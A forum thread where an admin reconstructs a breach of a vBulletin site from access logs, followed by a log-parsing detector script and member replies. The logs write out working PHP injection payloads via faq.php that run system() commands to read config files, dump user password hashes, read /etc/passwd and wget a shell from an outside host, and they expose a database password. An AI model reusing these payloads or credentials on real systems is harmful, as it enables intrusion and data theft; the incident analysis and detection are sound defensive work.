
Thread: Site Hack Attempt

  1. #1
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Site Hack Attempt

    If you want to skip all the tech stuff and get to the bottom line, skip to the bottom of the post.

    On Sunday March 22nd Stealth posted in Hex about some weird activity on two other admin accounts earlier that day. We have a couple of triggers that create a post in a special forum when certain actions are taken, and this tripped one of those triggers.

    Apparently at about 1:30 PM Sunday Darth Red logged in from Holland (which is not where he lives btw), tried to change a bunch of stuff in the admincp but failed because 95% of the technical stuff is locked down to Squid and me. Administrators are given permission to edit forums and users and stuff like that, but not change any of the server settings. Most of them cannot even edit themes. After failing to get what he wanted on Darth's account he tried to access other admin accounts. My account and Squid's account are hardcoded from being changed, so he changed the password for Gigantus and logged in as him which gave him no additional access rights.

    At that point he did edit the one thing he could edit that would allow him to get into the site structure, the FAQ page. There is a known exploit for vBulletin 3.8.6 (we use vBulletin 4.2.2) that will allow an attacker to read the config files for the site and gain database access information. So he edited faq.php back to the vBulletin 3 version, injected a couple of files, read the config files, and attempted to download userids, email addresses, and passwords for the entire site.


    Here is basically the order in which this went down:

    Logged in as Darth at 13:23
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:23:48 -0600] "POST /forums/login.php?do=login HTTP/1.1" 200 2334 "http://www.twcenter.net/forums/showgroups.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    At 13:26 tried to access the newsproxy.php which Darth does not have access to:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:26:12 -0600] "POST /forums/admincp/newsproxy.php HTTP/1.1" 200 3045

    At 13:27 tried to access the plugins, which Darth does not have access to:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:27:01 -0600] "GET /forums/admincp/plugin.php HTTP/1.1" 200 2168 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    At 13:28 edited Gigantus's account, logged out then back in:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:27:36 -0600] "GET /forums/showgroups.php HTTP/1.1" 200 22567 "http://www.twcenter.net/forums/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:28:06 -0600] "POST /forums/login.php?do=login HTTP/1.1" 200 2343

    Here he is trying the vBulletin 3 faq.php exploit out highlighted in red:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:28:39 -0600] "GET /forums/faq.php HTTP/1.1" 200 12124 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:02 -0600] "GET /forums/faq.php?faq=vb3_board_faq HTTP/1.1" 200 12975 "http://www.twcenter.net/forums/faq.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:09 -0600] "GET /forums/faq.php?faq=vb3_reading_posting HTTP/1.1" 200 16559 "http://www.twcenter.net/forums/faq.php?faq=vb3_board_faq" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:13 -0600] "GET /forums/admincp/faq.php?faq=vb3_reading_posting HTTP/1.1" 200 2703



    At 13:30 the faq.php page was edited by Darth Red's account. As you can see, there were lots of edits as he tried to get it right.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:23 -0600] "POST /forums/admincp/faq.php?do=update HTTP/1.1" 200 2220 "http://www.twcenter.net/forums/admincp/faq.php?do=edit&faq=vb3_smilies" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:26 -0600] "GET /forums/admincp/faq.php?do=edit&faq=vb3_smilies HTTP/1.1" 200 5348 "http://www.twcenter.net/forums/admincp/faq.php?faq=vb3_reading_posting" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:31 -0600] "POST /forums/admincp/faq.php?do=update HTTP/1.1" 200 2089 "http://www.twcenter.net/forums/admincp/faq.php?do=edit&faq=vb3_smilies" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:33 -0600] "GET /forums/admincp/faq.php?faq=%20vb3_reading_posting HTTP/1.1" 200 2698 "http://www.twcenter.net/forums/admincp/faq.php?do=update" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:41 -0600] "GET /forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B HTTP/1.1" 200 159953 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18 HTTP/1.1" 200 2825 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2536 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2158 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:43 -0600] "GET /forums/admincp/faq.php?do=edit&faq=vb3_smilies HTTP/1.1" 200 5360

    At 13:33 his first attempt to read the config file for the site. This attempt failed:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:33:34 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3B&faq=vb3_reading_posting&x=cat%20includes%2Fconfig.php HTTP/1.1" 200 81719 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"



    At 13:35 he successfully read the config file, which gave him the database username and password, and he selected the totalwar_vb database on Thor which is the main database for the site:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:35:16 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=cat%20includes%2Fconfig.php HTTP/1.1" 200 13545 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:36:04 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"



    At this point he started poking around other databases as well, though I do not think he was actually able to grab data which I will explain later. That Boonex database is a test I had running and just never killed, it had nothing in it but he was looking for premium member stuff. The database user and password are different on that database, so he couldn't get anything anyways though he did try.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:36:22 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20show%20tables%22 HTTP/1.1" 200 3431 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:37:57 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayChatMemberships%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:13 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayBoardCurrentUsers%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:31 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayChatCurrentUsers%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:40 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20sys_sbs_users%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"


    There are several entries like this one where he tried to pull userid, username, email, password, and salt from the users table. Now remember he is running this through a php script, and there are limits on the resources a php script can consume. Processes on the server are limited to 128 megs of RAM per script and a 30 second timeout. There is no way in hell this request fits inside those parameters, so he just got a 500 error.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:41:12 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x

    After dicking around for 20 minutes trying to dump all the users, he set a limit to try and pull the first 10 users. This makes sense, generally the person with the highest level access is userid 1 which is created when the software is installed, and he wants access to an admin account that can do everything. In the case of TWC the people with the most access are myself and Squid and both of our userids are above 22,000. So even if he was able to pull the information for the first 10 users, it doesn't do him any good.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:41:12 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Csalt)%20from%20user%20limit%2010%22 HTTP/1.1" 200 810 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    So now instead of trying to pull the whole thing at once, he attempts to dump small pieces at a time into a text file he created on the server named 1.txt so he can just copy the text file later:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:18:48 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Csalt)%20from%20user%20%22%20%3E%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    Here you can see several attempts to read that text file. Actually he is checking the file size of that file by executing this command that you can see if you strip out the html formatting:
    Code:
    ls -lah /var/www/forums/images/1.txt
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:18:58 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-la%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 92 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:19:03 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-lah%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 87 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:19:11 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-lah%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 87 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"


    I am assuming the file size on that was 0 bytes because he didn't open it, he just deleted it. He checked the size and ownership of it several times just before running this command:
    Code:
    rm /var/www/forums/images/1.txt
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:22:03 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=rm%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    Here he tries to login directly to MySQL, this translates to:
    Code:
    mysql -u root -proot -e "show databases"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:25:35 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-u%20root%20-proot%20-e%20%22show%20databases%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    He wouldn't need to do this if he had gotten the information he was looking for with the above queries, and I can promise you that our root password for MySQL is not "root".


    That doesn't work for him, so he tries to use the cat command on the passwd file for the server. Now this file doesn't have actual passwords in it, it's just a list of users and what their access rights are. He wants this so he can try to log in to the server directly.
    Code:
    cat /etc/passwd
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:25:47 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 1884 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    He is not able to log in to the server directly for two reasons:
    1. He doesn't even know the server's IP address. We are hidden behind CloudFlare. There isn't even a log of the attempt.
    2. If he did make it that far, we do not use password authentication. We use encrypted ssh keypairs and there are only 4 authorized keys for our entire network.



    So it's time to try another approach. He cannot access the database directly; the port for MySQL is not open to the public, it's only open on our internal network, and the server he has access to does not actually have the database on it. He has been forced to try and use a php script to pull data from a remote database on thor and is running into the php limits, and limiting his queries to fit within those limits hasn't gotten him what he needs. He hasn't been able to access the server via information in the /etc/passwd file.


    Here he uploads a file from a site running a 2012 version of WordPress that had already been compromised. This loads a php file into the site images folder that attempts to run a root level access server shell via script so he can gain complete control over the server without having to go through the conventional login methods.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:45:18 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=wget%20-O%20%2Fvar%2Fwww%2Fforums%2Fimages%2Frating%2Frating-trans-15_2.php%20http%3A%2F%2Fwww.waldgeist.org%2Fwp-content%2Fplugins%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    This little script created a file named lndex.php which is a php decoder to decode the base64 code he compiled on that WordPress site to try and execute a shell on our server.

    Two minutes after he executes this, he edits faq.php back to its original state to try and cover his tracks and leaves the site. About 5 hours later Stealth noticed the activity when he logged in and created a post about it in Hex. I saw it at about 2 AM Monday morning and locked out Darth and Gig until I could sort a few things out.

    Squid and I (mostly Squid) have been digging through stuff all week. At first we were not sure what the exploit was and how he got inside in the first place. This is why all plugins are currently disabled. Generally speaking plugins are exploited more often than the main software package is. We have permanently removed a few non-essential plugins and the rest will stay disabled until we sort out a couple more things.

    1. We need to verify every single file on the site. The easiest way to do this is to reinstall vanilla files freshly downloaded from vBulletin. We actually needed to do this anyways because I upgraded the site license for the CMS package we are going to install.
    2. We need to reset all of the FAQ pages to vanilla content so we can make sure there wasn't anything left behind. For now the FAQ page link has been removed from the site and is behind a login screen so that it cannot be accessed directly. This is the vBulletin FAQ not the FAQ on the wiki.

    When those two things are done we will start enabling other features again.



    To help prevent this kind of thing in the future we have taken a few steps.
    1. The admincp is no longer called the admincp and is behind another login screen. This means that to get to the admincp you actually have to know exactly where it is and then log in twice, once from a hardcoded file that is not stored anywhere within the web files for the site so is not visible from the outside, and once with your normal vBulletin login. The usernames and passwords for that first login are not our normal forum names and will never be posted or PMed on the site. That information will only be sent via email address between admins.
    2. The faq.php page can no longer be edited by administrators. Only by myself and Squid. We don't change it that often anyways so it's not a huge problem. I may do the same thing with the Calendar since we hardly ever use it.
    3. I reviewed the permissions of every person on the site that has access to the admincp and removed access from some inactive Tech Staff members. They still have access to the tech forums and if they become active again I will allow limited access to the admincp.
    4. I have changed the hardcoded users that cannot be edited in the admincp to help prevent us from being locked out if someone does manage to get past everything else. There are a few others besides myself and Squid that can only be edited if you have root level server access. I am not naming them in public.
    5. We will be reviewing the need for every single plugin on the site. This will take some time.



    The bottom line here is that the site was breached, but I do not think it was a serious breach. Every member of the site should go ahead and change their password just in case but I am not hugely concerned. vBulletin passwords are not stored in clear text, they are hashed and if it's reasonably complex then it would take days just to brute force a single password and generate a match. vBulletin does use MD5 encryption which isn't as good as SHA encryption (changing that would be a HUGE task, one that vBulletin needs to take on) and it's not like we have a bunch of sensitive information here. There are no credit cards, no financial records, no real names and addresses, etc. The worst they could do is steal your email address and then trash the site.



    Apologies for the inconvenience.


    EDIT: The one thing we are not clear about here is how Darth's account was compromised that started this whole thing off. It could be malware local on his machine, or someone packet sniffing his network, or any number of other things. An internet café, public wifi someplace. It's hard to tell.
    Last edited by GrnEyedDvl; March 28, 2015 at 01:08 AM.
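    As an added illustration (not code from the original post or from vBulletin), here is a small parser that pulls the pattern shown in the log excerpts above out of an access log: a `c=` parameter carrying PHP code on faq.php, the `x=` shell command it hands to system(), and FAQ rewrites through the admincp. The sample lines, IP, host, database host and credentials are constructed placeholders, and the report masks any `-p<password>` argument so the report itself does not leak what the log did.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in the same combined-log format as the thread's excerpts.
# 203.0.113.5, forum.example.net, dbhost, DBUSER and DBPASS are placeholders.
SAMPLE_LOG = """\
203.0.113.5 forum.example.net - [22/Mar/2015:13:28:39 -0600] "GET /forums/faq.php HTTP/1.1" 200 12124 "-" "Mozilla/5.0"
203.0.113.5 forum.example.net - [22/Mar/2015:13:29:13 -0600] "GET /forums/admincp/faq.php?faq=vb3_reading_posting HTTP/1.1" 200 2703 "-" "Mozilla/5.0"
203.0.113.5 forum.example.net - [22/Mar/2015:13:31:23 -0600] "POST /forums/admincp/faq.php?do=update HTTP/1.1" 200 2220 "-" "Mozilla/5.0"
203.0.113.5 forum.example.net - [22/Mar/2015:13:31:41 -0600] "GET /forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B HTTP/1.1" 200 159953 "-" "Mozilla/5.0"
203.0.113.5 forum.example.net - [22/Mar/2015:13:35:16 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=cat%20includes%2Fconfig.php HTTP/1.1" 200 13545 "-" "Mozilla/5.0"
203.0.113.5 forum.example.net - [22/Mar/2015:14:18:48 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20dbhost%20-u%20DBUSER%20-pDBPASS%20-e%20%22show%20databases%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0"
"""

# ip vhost - [timestamp] "METHOD target HTTP/x.y" status size ...  (referer/UA optional)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict (path + decoded query); None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec['target'])
    rec['path'] = url.path
    # parse_qs percent-decodes, so %24_GET%5B%27x%27%5D comes back as $_GET['x']
    rec['query'] = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return rec


def redact_secrets(cmd):
    """Mask a mysql-style -p<password> token so the report does not repeat a leaked credential."""
    return re.sub(r'(?<!\S)-p\S+', '-p<redacted>', cmd)


def classify(rec):
    """Label the two faq.php behaviours the thread walks through; None for everything else."""
    if not rec['path'].endswith('/faq.php'):
        return None
    q = rec['query']
    if 'admincp' in rec['path'].split('/') and rec['method'] == 'POST' and q.get('do') == 'update':
        return 'faq_admin_edit'        # FAQ content rewritten through the admin panel
    if 'c' in q:
        return 'faq_code_injection'    # 'c' is the parameter the backdoored page evaluated
    return None


def find_suspicious(log_text):
    """Return the flagged requests in log order, with the PHP and shell payloads decoded."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        shell = rec['query'].get('x')
        events.append({
            'ts': rec['ts'], 'ip': rec['ip'], 'kind': kind,
            'status': rec['status'], 'size': rec['size'],
            'code': rec['query'].get('c'),
            'shell': redact_secrets(shell) if shell else None,
        })
    return events


def timeline(log_text):
    """One line per event: the same kind of reconstruction the first post does by hand.
    The response size column is the tell for whether a command returned data (13545 bytes
    for a config read) or nothing at all (0 or a bare error page)."""
    out = []
    for e in find_suspicious(log_text):
        detail = e['shell'] or e['code'] or ''
        out.append(f"{e['ts']} {e['ip']} {e['kind']} [{e['status']} {e['size']}B] {detail}")
    return out


if __name__ == '__main__':
    for row in timeline(SAMPLE_LOG):
        print(row)
```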

  2. #2
    Ciciro's Avatar Protector Domesticus
    Join Date
    Jan 2012
    Location
    The Capital
    Posts
    4,038

    Default Re: Site Hack Attempt

    Good thing admins don't have that much power to change things, otherwise this could have been a hell of a lot worse.

  3. #3

    Default Re: Site Hack Attempt

    So from what I've read our passwords have not been taken, like last time, right?


  4. #4
    Cor De Ferrum's Avatar Ordinarius
    Join Date
    Oct 2011
    Location
    United Corporatist States of bank loans
    Posts
    748

    Default Re: Site Hack Attempt

    It is time to come clean.

    I am special agent Oyverstein Veyberg. I am work mossad and am pro hax0r.

  5. #5
    TheDarkKnight's Avatar Compliance will be rewarded
    Moderator Emeritus Content Emeritus Administrator Emeritus

    Join Date
    Oct 2010
    Location
    The good (not South) part of the USA
    Posts
    11,632
    Blog Entries
    12

    Default Re: Site Hack Attempt

    It's kind of frightening what someone can do when they are bored and have nothing better to do. I hope that you can eventually track this person down and give them a good GED smacking...or at least contact their ISP and tell them what they tried to do.

    As Ciciro said, this could have been a lot worse. Glad you guys already had some precautions in case this sort of thing happened.
    Things I trust more than American conservatives:

    Drinks from Bill Cosby, Flint Michigan tap water, Plane rides from Al Qaeda, Anything on the menu at Chipotle, Medical procedures from Mengele

  6. #6

    Default Re: Site Hack Attempt

    Quote Originally Posted by GrnEyedDvl View Post
    My account and Squid's account are hardcoded from being changed, so he changed the password for Gigantus and logged in as him which gave him no additional access rights.
    Just curious, wouldn't it be a good idea to hardcode all admins login?
    Or does the below make that redundant?
    Quote Originally Posted by GrnEyedDvl View Post
    1. The admincp is no longer called the admincp and is behind another login screen. This means that to get to the admincp you actually have to know exactly where it is and then login twice, once from a hardcoded file that is not stored anywhere within the web files for the site so is not visible from the outside, and once with your normal vBulletin login. The usernames and passwords for that first login are not our normal forum names and will never be posted or PMed on the site. That information will only be sent via email address between admins.

  7. #7
    Sir Adrian's Avatar the Imperishable
    Join Date
    Oct 2012
    Location
    Nehekhara
    Posts
    17,363

    Default Re: Site Hack Attempt

    What I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    Under the patronage of Pie the Inkster Click here to find a hidden gem on the forum!


  8. #8
    Mhaedros's Avatar Brave Heart Tegan
    Content Emeritus

    Join Date
    Feb 2011
    Location
    Finland
    Posts
    8,764
    Blog Entries
    2

    Default Re: Site Hack Attempt

    Quote Originally Posted by Doctor Shuu View Post
    What I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    Having someone's email and password could be surprisingly lucrative I reckon. Especially if they are the sort of person that uses the same password for multiple sites.
    Under the patronage of Finlander. Once patron to someone, no longer.
    Content's well good, innit.


  9. #9

    Default Re: Site Hack Attempt

    Well, they would be very disappointed with me. I use a forum email. My passwords are different for every email I use. I also use a different set for forums.

  10. #10
    The Mad Skylord's Avatar Tribunus
    Join Date
    Nov 2014
    Location
    The RPG Forums
    Posts
    7,493

    Default Re: Site Hack Attempt

    Luckily I have 3 or 4 different passwords lurking all of the time, so my email isn't too bad. The only stuff I pay for is my kindle, and that is on a different email.

    Still, this guy must be a big bloody prick to put our glorious admins to so much trouble.

  11. #11
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Re: Site Hack Attempt

    Quote Originally Posted by PikeStance View Post
    Just curious, wouldn't it be a good idea to hardcode all admins login?
    Or does the below make that redundant?
    The main reason you lock down an admin account is so that in case someone gets inside the system they can't lock you out. Since I have physical access to the servers obviously I cannot ever be locked out no matter what they do, though it would be a pain in the ass to drive downtown for something like this. But we don't want Squid or a couple of others locked out either, because I cannot always be around. Locking down every single admin just makes administration a pain in the ass. We can't reset their passwords without getting into the operating system, we can't edit their accounts for stuff such as listing them as local mods in a forum or making them group leaders or lots of other things. For the most part they cannot do any serious damage even if they wanted to so there is no reason to lock them down and create the pain of administering the administrators.

    The administrators on the TWC site have access rights to do what it is they need to do: administer users and forums. The faq.php page obviously is vulnerable so access to that has been removed. There may be another similar situation we are not aware of yet, but the stuff we know can be exploited (plugins, advertising, themes, maintenance tools, etc) is not needed for general forum administration and is not part of the average administrator's duties anyways, so they do not have access to it. Admins cannot hard delete (including myself and Squid without running special database queries), cannot directly access the database, cannot take mass actions like affecting tons of users at once, or cause lots of real damage intentional or otherwise. They simply do not need access to that stuff to do what they do on the forums.


    vBulletin is actually pretty granular about how you can apply admin permissions. Here is a shot of my permissions next to a shot of Darth Red's permissions. Obviously I have everything, as does Squid. But if you look at Darth there is lots of stuff he cannot do. Not because we do not trust him, but because he doesn't need to do anything else. As you can see most of the stuff he cannot do is technical, such as plugins. Anything that can be used to insert malicious code, such as bb codes or CRON jobs or advertising scripts, is restricted to Squid and me and even we do not actually access most of that very often. As mentioned obviously the FAQ page is a problem so it has been removed from their permissions set. If we discover something else that is a problem and is not routinely used by administrators we will remove that as well.
    [Attached images: adminperms.jpg and adminperms2.jpg]



    Quote Originally Posted by Doctor Shuu View Post
    What I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    It depends what their personal motivation is. What does someone get out of egging a house or keying a car or tagging a building? In some cases they are looking to make money, in some cases they are just looking to be a general pain in the ass. We have had someone insert their own advertising in the past. That stayed up for about 12 hours until Sim and I figured it out, so they might have made $50 or so at the top end. But unless they are truly familiar with the site, they don't know what they will find. vBulletin has a paid subscription section so that members can pay a monthly/yearly fee for access to certain forums. Obviously we do not use that but they do not know that unless they know the site well or manage to get in and poke around. Even if we did use that, I don't think that feature actually stores anything that could be used such as a credit card number.


    Quote Originally Posted by Mhaedros View Post
    Having someone's email and password could be surprisingly lucrative I reckon. Especially if they are the sort of person that uses the same password for multiple sites.
    There is that possibility as well.

  12. #12
    Magister Militum Flavius Aetius's Avatar δούξ θρᾳκήσιου
    Join Date
    Mar 2010
    Location
    Rock Hill, SC
    Posts
    16,318
    Tournaments Joined
    1
